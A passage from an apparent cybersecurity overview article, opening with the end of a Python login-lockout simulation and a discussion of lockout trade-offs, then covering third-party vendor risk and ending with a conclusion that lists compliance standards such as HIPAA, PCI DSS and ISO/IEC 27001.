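    for attempt, decision in zip(SAMPLE, replay(SAMPLE)):
        print(attempt, "->", decision)
```

The replay shows the trade-off of hard lockouts: alice is refused at t=9 even with the right password, because the attacker locked her out. That is why many deployments prefer escalating delays or a CAPTCHA over a hard lock, keep the lock short, and lean on MFA so that a guessed password is not enough on its own; the per-source cap also needs care behind NAT or a proxy, where one address represents many users.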

Third and fourth-party vendors

Most organizations outsource some of their functions to third-party vendors, including payroll, information technology, server hosting, and other services. These options offer organizations flexibility when expanding, but while convenient, outsourcing introduces its own set of cybersecurity risks.

Often, these vendors require access to sensitive data to provide their services. While they usually have good security practices, any organization is susceptible to cyber threats such as data breaches and other forms of exposure that can be damaging to their operations.

Vetting vendors and making sure they meet security standards that keep pace with emerging cyber threats is an important step in lowering the risk of onboarding any vendor.

If an organization chooses a vendor that does not take their cybersecurity seriously, it could introduce unnecessary vulnerabilities in their cyber defences, regardless of the level of security risk management implemented.

Conclusion

In a perfect world, there would not be any threats to digital infrastructure, but unfortunately, the world is not perfect, and organizations constantly fall victim to cyberattacks.

While often expensive to implement and maintain, cybersecurity is a critical component of an organization’s infrastructure and operations that cannot be ignored or be done inadequately.

Knowing what cyber threats are out there is a critical part of keeping an organization secure, and following industry security compliance standards like HIPAA, PCI DSS, GDPR, FISMA, SOX, ISO/IEC 27001, and SOC 2, is not perfect but is a great place to start building the foundations of a secure and private infrastructure.
